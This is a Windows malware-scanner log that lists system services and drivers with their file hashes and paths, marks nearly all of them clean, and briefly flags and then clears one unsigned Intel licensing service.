21:27:03.0596 0x0ce4  [ 5E92CB292D676634058E6C62653C9227, CE35C51B444664641306B4C2E21978B3418B58B2A973B19B908D86FE723FB4C4 ] DsmSvc          C:\WINDOWS\System32\DeviceSetupManager.dll
21:27:03.0610 0x0ce4  DsmSvc - ok
21:27:03.0614 0x0ce4  [ E479C2656A3A47F5D4FAD10AE6EAED52, B17D18D5440CF131EEADA385989A8ED0DB7728CAAC4E745720947DD1BC4F9EF6 ] DsSvc           C:\WINDOWS\System32\DsSvc.dll
21:27:03.0626 0x0ce4  DsSvc - ok
21:27:03.0632 0x0ce4  [ 682D7DF9704217DD8716307F9E2EEC05, A8D36414A7316C59995CF9689DD84B2FD3FECE47E39F515C81BC3C439890E993 ] DusmSvc         C:\WINDOWS\System32\dusmsvc.dll
21:27:03.0652 0x0ce4  DusmSvc - ok
21:27:03.0687 0x0ce4  [ 5FB6528EC95A2E83AE71005108C03D2B, F419FEA6679B59C5993235875C7857E8D960CDDC47E69EF08B20B6774FB08A45 ] DXGKrnl         C:\WINDOWS\System32\drivers\dxgkrnl.sys
21:27:03.0730 0x0ce4  DXGKrnl - ok
21:27:03.0737 0x0ce4  [ ECA1628436628362856ACF239E6AFD29, 19051DC348918B863E0A272CF56891B8CB49E7E705B8BAC7663D36C797A7B962 ] EapHost         C:\WINDOWS\System32\eapsvc.dll
21:27:03.0752 0x0ce4  EapHost - ok
21:27:03.0755 0x0ce4  EasyAntiCheat - ok
21:27:03.0801 0x0ce4  [ D64CD3AE93125EDA383190C2AF607E70, 3D180B96C6A2318842FA03AE5F703320A93CF1F440FF7D0E6F6F9BAD98F2FA02 ] ebdrv           C:\WINDOWS\system32\drivers\evbda.sys
21:27:03.0858 0x0ce4  ebdrv - ok
21:27:03.0866 0x0ce4  [ EABFCDA6E996F8A32DC1B302F7683BB2, 5FF2BA89D9A7BDE78C40866F15EC576527699ADD0F120E1A8388C4404A69F0E8 ] EFS             C:\WINDOWS\System32\lsass.exe
21:27:03.0873 0x0ce4  EFS - ok
21:27:03.0877 0x0ce4  [ FFBB37982E6D24AEC7A2E5459098EAC9, E89DD74540088ECAC9E802D7A059C0A6E3E5412BD42E5E9F26258724458EF8DB ] EhStorClass     C:\WINDOWS\system32\drivers\EhStorClass.sys
21:27:03.0884 0x0ce4  EhStorClass - ok
21:27:03.0888 0x0ce4  [ ABF38D02E01D6ED87AE1DF65FC5DF62D, 57D48609DA30F60016D2ADEB9A772942FB39A117247EB63FAE3FCF50D726B698 ] EhStorTcgDrv    C:\WINDOWS\system32\drivers\EhStorTcgDrv.sys
21:27:03.0894 0x0ce4  EhStorTcgDrv - ok
21:27:03.0969 0x0ce4  [ 8921F2C5CF96BD0903E6350CE109B266, 273ABF6300E6ACCD5F1F82973AAA2158649757C198B84CAB8AFD35EE699A5FD3 ] ElfoService     D:\Programme\ElsterFormular Update Service\bin\ElfoService.exe
21:27:03.0993 0x0ce4  ElfoService - ok
21:27:04.0001 0x0ce4  [ 0910A2954D7053537495DFF981177ACC, 9A70B599B02C67E3E3EC4FA10D76ABABA614B8CC224965B8F9479E13E68019A1 ] embeddedmode    C:\WINDOWS\System32\embeddedmodesvc.dll
21:27:04.0012 0x0ce4  embeddedmode - ok
21:27:04.0019 0x0ce4  [ CA966CED8970A60FB00A3592564EF093, 4BD904032445235EE69DAA0024E0FB3D8B2325D897A683E334754EB3CA90AB39 ] EntAppSvc       C:\WINDOWS\system32\EnterpriseAppMgmtSvc.dll
21:27:04.0032 0x0ce4  EntAppSvc - ok
21:27:04.0035 0x0ce4  [ B9A59B4AD516E38C39FA416398B96CCB, 4630A9AD414476B47F634F2EB5659597797222A8938B68847B97FECCE1A1B5F8 ] ErrDev          C:\WINDOWS\System32\drivers\errdev.sys
21:27:04.0043 0x0ce4  ErrDev - ok
21:27:04.0054 0x0ce4  [ 1541374239F33512D7F4D24ED1E9238C, 8B1548D4052A72175EB6ADA9FD4286ACD5041E1CE071DCAC3760BB227FCD3621 ] EventSystem     C:\WINDOWS\system32\es.dll
21:27:04.0070 0x0ce4  EventSystem - ok
21:27:04.0077 0x0ce4  [ 9C4D88E8614487AD85A6F18A71A7298F, EE6F48C89D6379C7361484EAE7C7FAAA477D48032BFDD0D363E48642E62EADF4 ] exfat           C:\WINDOWS\system32\drivers\exfat.sys
21:27:04.0091 0x0ce4  exfat - ok
21:27:04.0098 0x0ce4  [ 8F51A5633DEB18DBC8B1C117B42B23D7, C45FEE32C5AB67CEC86AB1388AC2E3508AF5811D8B8A204AAC8E5DC42C749A2C ] fastfat         C:\WINDOWS\system32\drivers\fastfat.sys
21:27:04.0109 0x0ce4  fastfat - ok
21:27:04.0121 0x0ce4  [ ECC5AEFEA31F1A078E954305B8CA6373, 15948D017E3B52D3B4BBEC047F963BD77247E24A59F0532B6A023B0C4159FC84 ] Fax             C:\WINDOWS\system32\fxssvc.exe
21:27:04.0141 0x0ce4  Fax - ok
21:27:04.0144 0x0ce4  [ 853081957BA148F38FD8DE4390CFCF4A, 37C92C7ABA55A5FF7094F77F8EBEEE1F4BEE161CEC6B01A50FC0D0C39E36C142 ] fdc             C:\WINDOWS\System32\drivers\fdc.sys
21:27:04.0151 0x0ce4  fdc - ok
21:27:04.0154 0x0ce4  [ 885C06C35CC8FAEDDE3CDA36B72CA2A9, FF6584E7AF2FB540B2183665C3E216BE98DE953CEA6A7E4C5F13514BE4AAC9D3 ] fdPHost         C:\WINDOWS\system32\fdPHost.dll
21:27:04.0164 0x0ce4  fdPHost - ok
21:27:04.0167 0x0ce4  [ 367E878C79D9F391E3D53B6BBC1B6386, 739D89F6954E17B73F53702CFF8EE985FB241255D962A83BAF1A20E783CAF466 ] FDResPub        C:\WINDOWS\system32\fdrespub.dll
21:27:04.0177 0x0ce4  FDResPub - ok
21:27:04.0181 0x0ce4  [ 514F6A0B83527DD6ACCC8B21A57B10E3, EA3D401E42D05BA39E5874513DFB895A086BECE4D69FC1AC12F85F326A435A4B ] fhsvc           C:\WINDOWS\system32\fhsvc.dll
21:27:04.0193 0x0ce4  fhsvc - ok
21:27:04.0196 0x0ce4  [ 27E764D6460504B7271AFECE7A59FB76, A32B08142068BF042B3E47C0CA7F4FCFD07A37807B1B8DAAE614F3A132475D52 ] FileCrypt       C:\WINDOWS\system32\drivers\filecrypt.sys
21:27:04.0203 0x0ce4  FileCrypt - ok
21:27:04.0207 0x0ce4  [ 3D6087F51110F3CC0DA89385354F8C5E, 49FF976C3391A257BCD4B048BF6D1273F8537005E32D65E5F272AF3294639F05 ] FileInfo        C:\WINDOWS\system32\drivers\fileinfo.sys
21:27:04.0213 0x0ce4  FileInfo - ok
21:27:04.0216 0x0ce4  [ 057E95E53C38260C4EF49B3A077770CD, 7008E71663046FF1D91D9DC3570094561C812067E1CA07715A1D2E4F787207AE ] Filetrace       C:\WINDOWS\system32\drivers\filetrace.sys
21:27:04.0226 0x0ce4  Filetrace - ok
21:27:04.0229 0x0ce4  [ 90B2983D8495C26345A1DC5F0C3BB07B, 50D834D40C27EEF5023556A77B13D3335789333E302A73DF221CD86D156FDEE9 ] flpydisk        C:\WINDOWS\System32\drivers\flpydisk.sys
21:27:04.0236 0x0ce4  flpydisk - ok
21:27:04.0243 0x0ce4  [ A84261F75F490E45CFEDBA77EFE4F67E, 292BA04D8996140255E4B6105015C2A640890BEFB6C022E30E0D9CBF45D5F4DB ] FltMgr          C:\WINDOWS\system32\drivers\fltmgr.sys
21:27:04.0254 0x0ce4  FltMgr - ok
21:27:04.0282 0x0ce4  [ 3B42FD3CCD1E7A6A192B88284B0CBA4F, 2ABD147A845AAD109F1E27258D60E4AE7AB582F303A821436CFF17645AE8F6D9 ] FontCache       C:\WINDOWS\system32\FntCache.dll
21:27:04.0326 0x0ce4  FontCache - ok
21:27:04.0333 0x0ce4  [ B282011D13BBEEA0273DF33C5E776D55, B4AF068BBB09D0F546F5590FCDD745250CFD58DD3A8ABF5DC26670FA32D181FB ] FontCache3.0.0.0 C:\WINDOWS\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
21:27:04.0341 0x0ce4  FontCache3.0.0.0 - ok
21:27:04.0351 0x0ce4  [ 8E0A89C8BC29F4B066B1DA4B96A63609, 1F4ABEC209ECDCA20620C7D7DB0C407F8D1032D506259B11FEAF2A0C3E14B1A3 ] FrameServer     C:\WINDOWS\system32\FrameServer.dll
21:27:04.0371 0x0ce4  FrameServer - ok
21:27:04.0374 0x0ce4  [ D2814848206DFC18EB8D3D069FAE703E, A62263CDF9261B692423473F4FF23B01AC864C05850BA5591EB9019906B4A08B ] FsDepends       C:\WINDOWS\system32\drivers\FsDepends.sys
21:27:04.0380 0x0ce4  FsDepends - ok
21:27:04.0383 0x0ce4  [ AE7EDF845F41ACA3B74567C3CE20E987, 6159C227C85912B03D8C35A1EF91705AE6C1C23C7228D6FCC0A9529844798E1B ] Fs_Rec          C:\WINDOWS\system32\drivers\Fs_Rec.sys
21:27:04.0389 0x0ce4  Fs_Rec - ok
21:27:04.0401 0x0ce4  [ FF0699483185CE3B4E1144DF19AC5E97, 9BA0A2F04A1A51AFC3B830452AC75BE2D76300BAF1918BCF5AB60E4EB9888F0F ] fvevol          C:\WINDOWS\system32\DRIVERS\fvevol.sys
21:27:04.0417 0x0ce4  fvevol - ok
21:27:04.0420 0x0ce4  [ 4616F61E24B3AEA6E0E4EA7D69531EF4, 34CB16F68E4A4D19346C7FEC29BB5FE09BAAEC19EA730C9B93450F940D124D49 ] gencounter      C:\WINDOWS\System32\drivers\vmgencounter.sys
21:27:04.0426 0x0ce4  gencounter - ok
21:27:04.0429 0x0ce4  [ 23174BB6937459B924BB8EF667FB28EF, 6675B87F4DE9CCA96B6BAB9F77C4E0B377828613D9FFB03F7D443AF11321F157 ] genericusbfn    C:\WINDOWS\System32\drivers\genericusbfn.sys
21:27:04.0436 0x0ce4  genericusbfn - ok
21:27:04.0441 0x0ce4  [ 4B11CFBE1D9B73A9D865F6AB26F800BA, BD76CB5AF0EE6DD404875A4C36622C6BC8CCF2975C47E28DD305EB041C6C0B91 ] GPIOClx0101     C:\WINDOWS\system32\Drivers\msgpioclx.sys
21:27:04.0448 0x0ce4  GPIOClx0101 - ok
21:27:04.0468 0x0ce4  [ CF22C0941409C772AA1568DC4F89A111, ED5895F024E64B672EB3FAE6C456FA0D30A068CF2B475A7EE988DEA4DCD6D8DE ] gpsvc           C:\WINDOWS\System32\gpsvc.dll
21:27:04.0503 0x0ce4  gpsvc - ok
21:27:04.0506 0x0ce4  [ 3FC3FCF557D0BE3D724EA10642E1F6FF, 744D0DDE748A1B681087668CB893F9A60A2BBE80A71098944E75B6A9AA934C82 ] GpuEnergyDrv    C:\WINDOWS\system32\drivers\gpuenergydrv.sys
21:27:04.0520 0x0ce4  GpuEnergyDrv - ok
21:27:04.0524 0x0ce4  [ 053EEEE1ABAE53F044F1E386E22AE525, 195C8B78C0CF68F3DC1C08E58CE2A7146764F9273C39EF369194A366FA8EE1AD ] gupdate         C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
21:27:04.0530 0x0ce4  gupdate - ok
21:27:04.0533 0x0ce4  [ 053EEEE1ABAE53F044F1E386E22AE525, 195C8B78C0CF68F3DC1C08E58CE2A7146764F9273C39EF369194A366FA8EE1AD ] gupdatem        C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
21:27:04.0539 0x0ce4  gupdatem - ok
21:27:04.0544 0x0ce4  [ F72818A52CBB5A9E8B2C9E350638A945, BB8E637DA21C911465FB13D7D28AAAE80691EA824146EEEA4AB94F86E5203567 ] gzflt           C:\WINDOWS\system32\DRIVERS\gzflt.sys
21:27:04.0551 0x0ce4  gzflt - ok
21:27:04.0554 0x0ce4  [ DD1A6F4998E7E21564FA9BAFE21C87ED, CAD04E9B8244ACA3314C6FD4422BE7A3B578AF1E61F13773A2C5DB388B3337F6 ] HDAudBus        C:\WINDOWS\System32\drivers\HDAudBus.sys
21:27:04.0562 0x0ce4  HDAudBus - ok
21:27:04.0565 0x0ce4  [ 9F90819E301C70A3A042FC05D3E41B5F, D2175786775D08686264001ABAA4B61DC08A847666F6B9A2A64D10BFC022F646 ] HidBatt         C:\WINDOWS\System32\drivers\HidBatt.sys
21:27:04.0571 0x0ce4  HidBatt - ok
21:27:04.0575 0x0ce4  [ 3CA3244C45B25F3B3ED9445C195E40EB, 9C43B31DAB473D29069D0D6BC130660424FE2414BA519107641FA1561C10C76D ] HidBth          C:\WINDOWS\System32\drivers\hidbth.sys
21:27:04.0583 0x0ce4  HidBth - ok
21:27:04.0587 0x0ce4  [ 55DAF856F9633DD2519BA4E942870F02, 5283548CB93EB46C5FD3B08E45C97BBFB33D47F11F89560508775889FBF2F754 ] hidi2c          C:\WINDOWS\System32\drivers\hidi2c.sys
21:27:04.0594 0x0ce4  hidi2c - ok
21:27:04.0598 0x0ce4  [ E34216A190D9BF8EAA666F6903BCD0EF, DA8529DAF903B447CC5FF2D112F670696549A4B66F54DF9A8C8C615D969CD477 ] hidinterrupt    C:\WINDOWS\System32\drivers\hidinterrupt.sys
21:27:04.0604 0x0ce4  hidinterrupt - ok
21:27:04.0607 0x0ce4  [ 852DBB5185996AD8C73872A43A453729, 8C20331AE99E280799407CC5FCF88F8F645C331604230876A2CD7C253B9BD633 ] HidIr           C:\WINDOWS\System32\drivers\hidir.sys
21:27:04.0614 0x0ce4  HidIr - ok
21:27:04.0618 0x0ce4  [ 6339CC87F0F610D1575C9A419940602A, B2A054ED0B669FA54E250EC2926955B1D944FA1FB2AF5B590C181CB2E9D297BA ] hidserv         C:\WINDOWS\system32\hidserv.dll
21:27:04.0626 0x0ce4  hidserv - ok
21:27:04.0629 0x0ce4  [ C1A608120DE0DF52E51B8BAF86AF19F9, F3529822E78CFCA2E323A75926A833529889E40BB9602B287CC343C496CB2062 ] HidUsb          C:\WINDOWS\System32\drivers\hidusb.sys
21:27:04.0636 0x0ce4  HidUsb - ok
21:27:04.0642 0x0ce4  [ BD1CF47172B97707DFC66ADA741AE2BE, 9607AB7074FC54D88FDF6E2A31506BCF8ECBF8FD651BB5CEA2421471C24BCED1 ] HomeGroupListener C:\WINDOWS\system32\ListSvc.dll
21:27:04.0655 0x0ce4  HomeGroupListener - ok
21:27:04.0664 0x0ce4  [ A004895B838003BAE2281DAF193B6A09, 587FCDCEF769B2AED12551B6426477B764CB8A025E692D4EC8B24E1CBA1C06E3 ] HomeGroupProvider C:\WINDOWS\system32\provsvc.dll
21:27:04.0681 0x0ce4  HomeGroupProvider - ok
21:27:04.0685 0x0ce4  [ 8ADD9CA3E0F18CEA11EA6FAED794A228, B46BA885ED8253A253B1C87C331CA145F7F397AF49853038B3F1EDAF81B2C4BA ] HpSAMD          C:\WINDOWS\system32\drivers\HpSAMD.sys
21:27:04.0692 0x0ce4  HpSAMD - ok
21:27:04.0709 0x0ce4  [ 2413454E305678EA9A486E8DE2E67849, 5E821E909F99BAB782D89A0CDBFAE5474FEA211EB4F626A824D10D733F3FDC67 ] HTTP            C:\WINDOWS\system32\drivers\HTTP.sys
21:27:04.0732 0x0ce4  HTTP - ok
21:27:04.0737 0x0ce4  [ D3C45F1B5BB3EE772CDA416A4A3EEB9B, 97CD988CF307EBCC34F37F130F4F2C989DD17E70B2498DB1929B566A3387887B ] HvHost          C:\WINDOWS\System32\hvhostsvc.dll
21:27:04.0744 0x0ce4  HvHost - ok
21:27:04.0747 0x0ce4  [ F60F8390B635156593F7493AE898AFB0, AC5E58CDA12072C5FDBFEA0FA009CE2E251D143FC0878B2658ECCCF797B8B0EC ] hvservice       C:\WINDOWS\system32\drivers\hvservice.sys
21:27:04.0754 0x0ce4  hvservice - ok
21:27:04.0756 0x0ce4  [ 563F5FC3B46A70A91AB6C8822AC8BF25, 43E647A7752D7444BF306E38571130AB778AA2A6892782C6C1112E47FBEFBC87 ] hwpolicy        C:\WINDOWS\system32\drivers\hwpolicy.sys
21:27:04.0762 0x0ce4  hwpolicy - ok
21:27:04.0764 0x0ce4  [ C082249BC3E972C8A132D9EC6AD9EAD5, D69EEFD97CF5E0BD64D11DE1C331D02A9BE522BB93A40FF32ED434D960B85D39 ] hyperkbd        C:\WINDOWS\System32\drivers\hyperkbd.sys
21:27:04.0771 0x0ce4  hyperkbd - ok
21:27:04.0775 0x0ce4  [ C6C8315E3262FAE460529C6DA2951682, 4ADBFA6601209BF6F5A9797721CBE2011905775CF4E266D7B42F89915D477E95 ] i8042prt        C:\WINDOWS\System32\drivers\i8042prt.sys
21:27:04.0784 0x0ce4  i8042prt - ok
21:27:04.0787 0x0ce4  [ C6B8743B213F06AA60943D8366FE968F, 758954F70B810063914B243115B2C753B2BCE40190F95C30ACBA0BF04EBD5B33 ] iagpio          C:\WINDOWS\System32\drivers\iagpio.sys
21:27:04.0794 0x0ce4  iagpio - ok
21:27:04.0797 0x0ce4  [ 9A2A2F3C69B9A30B6E78536F6D258BAD, 5E28E132A7300E6F5E0C6439D6BA00F1AEF66D729FF671FDA91274A25A921463 ] iai2c           C:\WINDOWS\System32\drivers\iai2c.sys
21:27:04.0805 0x0ce4  iai2c - ok
21:27:04.0809 0x0ce4  [ 42962355A7911407026E920E7252E3E5, 4A4016A53ED61354C81C594968339E6F3CCCFF4A64F8F28AD008ED8137E05AD2 ] iaLPSS2i_GPIO2  C:\WINDOWS\System32\drivers\iaLPSS2i_GPIO2.sys
21:27:04.0817 0x0ce4  iaLPSS2i_GPIO2 - ok
21:27:04.0821 0x0ce4  [ BD47B2FEABFA48C6224D43EE9EA9BC06, 304628CA458AA7B1B8B1CFF12074AD75C1CE7BD41820B99607D7FA99A817D007 ] iaLPSS2i_GPIO2_BXT_P C:\WINDOWS\System32\drivers\iaLPSS2i_GPIO2_BXT_P.sys
21:27:04.0829 0x0ce4  iaLPSS2i_GPIO2_BXT_P - ok
21:27:04.0834 0x0ce4  [ 2184CB3A65888F446FCD6DBA9F073F4C, 0B3D63EC7F61BFAD490C123084965A9F38DBFE587AC9DAE6F4E6B68AD8093DB2 ] iaLPSS2i_I2C    C:\WINDOWS\System32\drivers\iaLPSS2i_I2C.sys
21:27:04.0843 0x0ce4  iaLPSS2i_I2C - ok
21:27:04.0848 0x0ce4  [ 4126F8DA08CE7924A3AE6F7235F85D5F, 668DC1D09496A95F44C07C5C1F6ED7D3EFC6F89523B2744A86B460E5BECAEFB5 ] iaLPSS2i_I2C_BXT_P C:\WINDOWS\System32\drivers\iaLPSS2i_I2C_BXT_P.sys
21:27:04.0858 0x0ce4  iaLPSS2i_I2C_BXT_P - ok
21:27:04.0862 0x0ce4  [ 16A10CCEDCF5AC4CAAE43DC9FC40392F, F77696AE55B992154A3B35F7660BD73E0AB35A6ECEEC1931C0D35748CFA605C0 ] iaLPSSi_GPIO    C:\WINDOWS\System32\drivers\iaLPSSi_GPIO.sys
21:27:04.0867 0x0ce4  iaLPSSi_GPIO - ok
21:27:04.0871 0x0ce4  [ EB82A11613326691508D9ED9A4FE29E7, 8445E41BAB21964C7F014742795E462BDDC6C37A261990B3D6BF4E637A719547 ] iaLPSSi_I2C     C:\WINDOWS\System32\drivers\iaLPSSi_I2C.sys
21:27:04.0880 0x0ce4  iaLPSSi_I2C - ok
21:27:04.0891 0x0ce4  [ D820075D3395BED28FC57AEF8FBA666F, 7589CCCD355D2685C0E6D317AB39F0DB061153E6859A0F53834B001643CFDF57 ] iaStorAV        C:\WINDOWS\system32\drivers\iaStorAV.sys
21:27:04.0908 0x0ce4  iaStorAV - ok
21:27:04.0917 0x0ce4  [ A243E0CE8644378C9A9D015ABC3EDA27, 0C72F6D39DD64A16F54BCE185F4D8E670D386823F6364E9ED284F7F8DE11CBF5 ] iaStorV         C:\WINDOWS\system32\drivers\iaStorV.sys
21:27:04.0928 0x0ce4  iaStorV - ok
21:27:04.0938 0x0ce4  [ E16E4FC9F250E48CB2CAD93E59D010E2, EFF558EDD63DB0FD8BA240E94BD5999106233B95BF86BFB99EE9B897F41C542B ] ibbus           C:\WINDOWS\System32\drivers\ibbus.sys
21:27:04.0951 0x0ce4  ibbus - ok
21:27:04.0957 0x0ce4  [ D9A9FFC89F61CAD4AD9EF31FBB17E634, F81184889B30DA8947F22A9C9ED5C542295ED70F0A1C27D1C91BAC21F4BCD987 ] ICCS            C:\Program Files (x86)\Intel\Intel(R) Integrated Clock Controller Service\ICCProxy.exe
21:27:04.0964 0x0ce4  ICCS - ok
21:27:04.0969 0x0ce4  [ E3061D5ABA80394D29E26EA58AF7F69A, 9BCF1AD2CC9C7E48FD350F9D59797E17F355C840EDE428143764F93716159C20 ] icssvc          C:\WINDOWS\System32\tetheringservice.dll
21:27:04.0982 0x0ce4  icssvc - ok
21:27:04.0989 0x0ce4  [ 4AB719D0CEB64ED85D30EB974A5C806E, 57DAFB6C884FA2A1A9FBDD19F91F4326A76C975AEB74011A9D18D15F2423A767 ] ignis           C:\WINDOWS\system32\DRIVERS\ignis.sys
21:27:04.0998 0x0ce4  ignis - ok
21:27:05.0015 0x0ce4  [ E9E4BB312F6B544392F44D513FAA2243, 3E6917BCE9F1AF554D57FED9E76B33F36D92145B0090A5F8F64E2A53EB4C54A4 ] IKEEXT          C:\WINDOWS\System32\ikeext.dll
21:27:05.0042 0x0ce4  IKEEXT - ok
21:27:05.0046 0x0ce4  [ 0E33BC018502E7FDE77C343055D9C626, CD1C60E8EDAA044E03E5776962E091C1288204033A57A799D446F9B058D6AD59 ] IndirectKmd     C:\WINDOWS\System32\drivers\IndirectKmd.sys
21:27:05.0053 0x0ce4  IndirectKmd - ok
21:27:05.0113 0x0ce4  [ FEE5C21569883B2BDC655FC875CCBA21, 273C017155DB92AC3408E9A1DF5D8A4BCFFED6C3C6C2474E883E6905DFABDCFC ] IntcAzAudAddService C:\WINDOWS\system32\drivers\RTKVHD64.sys
21:27:05.0176 0x0ce4  IntcAzAudAddService - ok
21:27:05.0192 0x0ce4  [ DAE6C3099D291EED8922A65C29ABCF52, AD0A932345382824122F84AF97A8609BAE1B916A3B9FD608779A1411E37D3643 ] Intel(R) Capability Licensing Service Interface C:\Program Files\Intel\iCLS Client\HeciServer.exe
21:27:05.0210 0x0ce4  Intel(R) Capability Licensing Service Interface - detected UnsignedFile.Multi.Generic ( 1 )
21:27:05.0524 0x0ce4  Detect skipped due to KSN trusted
21:27:05.0524 0x0ce4  Intel(R) Capability Licensing Service Interface - ok
21:27:05.0539 0x0ce4  [ D45226E3E7A25F1E7CE8DF8FD0A2A098, 7BD74E9E3CB0A83D26BA3FD8177C6B9BA46A8695B6569CF7887FDC87947DA2D6 ] Intel(R) Capability Licensing Service TCP IP Interface C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe
21:27:05.0554 0x0ce4  Intel(R) Capability Licensing Service TCP IP Interface - ok
21:27:05.0558 0x0ce4  [ 4B7F8A1AAC7172DB6918A0E10E1D78A3, 1E9922AF9B5458F23A379EDCD61B615B6E53BAF8927237C1C7DCC04122CCF417 ] intelide        C:\WINDOWS\system32\drivers\intelide.sys
21:27:05.0563 0x0ce4  intelide - ok
21:27:05.0566 0x0ce4  [ 0A3DBE89C965FFB7C0D0E38834E77B90, 0166BE79228ED6B3D7AA1BACB4F1BB68357DBF70DF778B2F8A3776E374EE690C ] intelpep        C:\WINDOWS\system32\drivers\intelpep.sys
21:27:05.0573 0x0ce4  intelpep - ok
21:27:05.0578 0x0ce4  [ 64EC687A811DC4F69DF3816F073352AA, F70942B67448DF9848F32F88D37E1E0C548CE9FEFC4376628D7CBEF62494D8E1 ] intelppm        C:\WINDOWS\System32\drivers\intelppm.sys
21:27:05.0589 0x0ce4  intelppm - ok
21:27:05.0592 0x0ce4  [ 7C0766B89BACA46A5CEE48FD4F5DF2AD, 8843F02A3F2F395698D618C376283314A0D729B2C3C2AE8BFA13F0CB64F61097 ] IOMap           C:\WINDOWS\system32\drivers\IOMap64.sys
21:27:05.0596 0x0ce4  IOMap - ok
21:27:05.0599 0x0ce4  [ 549C278119FF539C3B219C55B98B0E87, B4C15AB0C77EAB6C5ADEBD014F610BBFC537EAEB0E3960636624001C8A5DE56E ] iorate          C:\WINDOWS\system32\drivers\iorate.sys
21:27:05.0605 0x0ce4  iorate - ok
21:27:05.0609 0x0ce4  [ A0F9F2E87F0C751FE164D90EB44A9B63, BE816F17E43E5F80AC65E913AB7F9E77B8D6B70B90A784CB00C907D3DAFFD4DB ] IpFilterDriver  C:\WINDOWS\system32\DRIVERS\ipfltdrv.sys
21:27:05.0618 0x0ce4  IpFilterDriver - ok
21:27:05.0633 0x0ce4  [ 57A93FCF94FAB8C2161335E56C81CD16, 4A642E4FF70DA209074B78EC50B76A024DB5D01B8C9FCC405A64AF0F1A7EA389 ] iphlpsvc        C:\WINDOWS\System32\iphlpsvc.dll
21:27:05.0667 0x0ce4  iphlpsvc - ok
21:27:05.0671 0x0ce4  [ 656DDB34996A96539BA6E2843B5F2A77, EDC3F1A2BA38A9655361A20B6C8001984AEB1A530C5385CF6EC0AF595305DBC7 ] IPMIDRV         C:\WINDOWS\System32\drivers\IPMIDrv.sys
21:27:05.0678 0x0ce4  IPMIDRV - ok
21:27:05.0683 0x0ce4  [ DCC05E5EAA580C97F13B434FAFACED85, 5C6CFD3D9FAEB7274E05F3D19D3AA064624500C616650DE227B849B505662BB4 ] IPNAT           C:\WINDOWS\system32\drivers\ipnat.sys
21:27:05.0693 0x0ce4  IPNAT - ok
21:27:05.0697 0x0ce4  [ 9A6B993A95CCA15502DE3C980508DC44, 370A1A4531A72CFBF331ED274913925A269115A13E3A6B5E1821FB48DD7242AE ] IpxlatCfgSvc    C:\WINDOWS\System32\IpxlatCfg.dll
21:27:05.0711 0x0ce4  IpxlatCfgSvc - ok
21:27:05.0715 0x0ce4  [ 9035C10C7EB8CF7C87CEA82A62EBB43A, A0DA94E80E503DB3C2877CE1BCDC70B3FCC6861ADFBCCE66C6D2592BD63F27DC ] irda            C:\WINDOWS\system32\drivers\irda.sys
21:27:05.0725 0x0ce4  irda - ok
21:27:05.0727 0x0ce4  [ E7FD479E3298F3C8852A0D2F092BDB35, 07F2E779268EBBF4F32ED1C8423493B36BA823905E71B524C6AEBA0093193307 ] IRENUM          C:\WINDOWS\system32\drivers\irenum.sys
21:27:05.0735 0x0ce4  IRENUM - ok
21:27:05.0738 0x0ce4  [ 65B145143F6E5E1B5A213F0D9F4C4C44, 0E390BD8D7B4B9562E8FEE0D109DCE0D9EA823FD2D20B39FFACE3331F30FE5BC ] irmon           C:\WINDOWS\System32\irmon.dll
21:27:05.0746 0x0ce4  irmon - ok
21:27:05.0749 0x0ce4  [ 7FE3B3A30FA20F27AF7022A01C2266BA, 8AB924F08ABF1DCB154B6A3BDB7E3E5A863008B5AFF8E3DB9759848774E00E8A ] isapnp          C:\WINDOWS\system32\drivers\isapnp.sys
21:27:05.0755 0x0ce4  isapnp - ok
21:27:05.0761 0x0ce4  [ D492648D96A14BA639B76D177B24CD82, D65D2494BAC8A317FD70293E59D039078D1D19FAE20A4EB2665246CAACFF0C6F ] iScsiPrt        C:\WINDOWS\System32\drivers\msiscsi.sys
21:27:05.0770 0x0ce4  iScsiPrt - ok
21:27:05.0775 0x0ce4  [ 52069AEB42D3D0F97CBCA1085EBF55E6, ADB2EFFF563B3FE113FCD156FD1E469BC24FC1D68AFEDCA21306F76592C9FF88 ] jhi_service     C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
21:27:05.0781 0x0ce4  jhi_service - ok
21:27:05.0784 0x0ce4  [ D36B404BF979297C6572AEF98B2594F2, CB2F4E6589936D35D59CA70B39A29D091540EA125BE4B937AF92CEA0C6D0AAEB ] kbdclass        C:\WINDOWS\System32\drivers\kbdclass.sys
21:27:05.0791 0x0ce4  kbdclass - ok
21:27:05.0793 0x0ce4  [ 7E2036A846789D6D6A2EE21915017EE1, 82AF85CA30B440E453F7694C7EDABB5D2DB213AD2FE8620B92667DFB492229A1 ] kbdhid          C:\WINDOWS\System32\drivers\kbdhid.sys
21:27:05.0800 0x0ce4  kbdhid - ok
21:27:05.0803 0x0ce4  [ 4C054B8E901F41F5743DADE8A29FF256, 1009CC2503E08AFEA849BA83135C2D75C573FC4D6EFB5DBCDCC7ACB17AF83152 ] kdnic           C:\WINDOWS\System32\drivers\kdnic.sys
21:27:05.0811 0x0ce4  kdnic - ok
21:27:05.0814 0x0ce4  [ EABFCDA6E996F8A32DC1B302F7683BB2, 5FF2BA89D9A7BDE78C40866F15EC576527699ADD0F120E1A8388C4404A69F0E8 ] KeyIso          C:\WINDOWS\system32\lsass.exe
21:27:05.0821 0x0ce4  KeyIso - ok
21:27:05.0825 0x0ce4  [ BA7A5838866618A4E82FBC05B8923605, 96E898C7768BED66487A00E02B2E50516602BCF54E6648F5528E3334AE8527EB ] KSecDD          C:\WINDOWS\system32\Drivers\ksecdd.sys
21:27:05.0832 0x0ce4  KSecDD - ok
21:27:05.0837 0x0ce4  [ 6629CAA1F157088B9EDD1EAD24C6D753, 3E5F3BCB34F4B52BE46B96F9F720FE5FB37A01D4E408875F6BB89F5B5C5A3900 ] KSecPkg         C:\WINDOWS\system32\Drivers\ksecpkg.sys
21:27:05.0845 0x0ce4  KSecPkg - ok
21:27:05.0848 0x0ce4  [ 365D39AD9D6BD9D61299DC098CDFC9E4, 7747A065818E1747C4FF4A96E069DE36919DFCC564D06CA232FD5EED44152687 ] ksthunk         C:\WINDOWS\system32\drivers\ksthunk.sys
21:27:05.0862 0x0ce4  ksthunk - ok
21:27:05.0870 0x0ce4  [ 08F9C3F7FE3019BF53B1405B1820528F, E90940533F88A33C396E1DF9D186E945F030315FB2201E479F144E27387333CA ] KtmRm           C:\WINDOWS\system32\msdtckrm.dll
21:27:05.0884 0x0ce4  KtmRm - ok
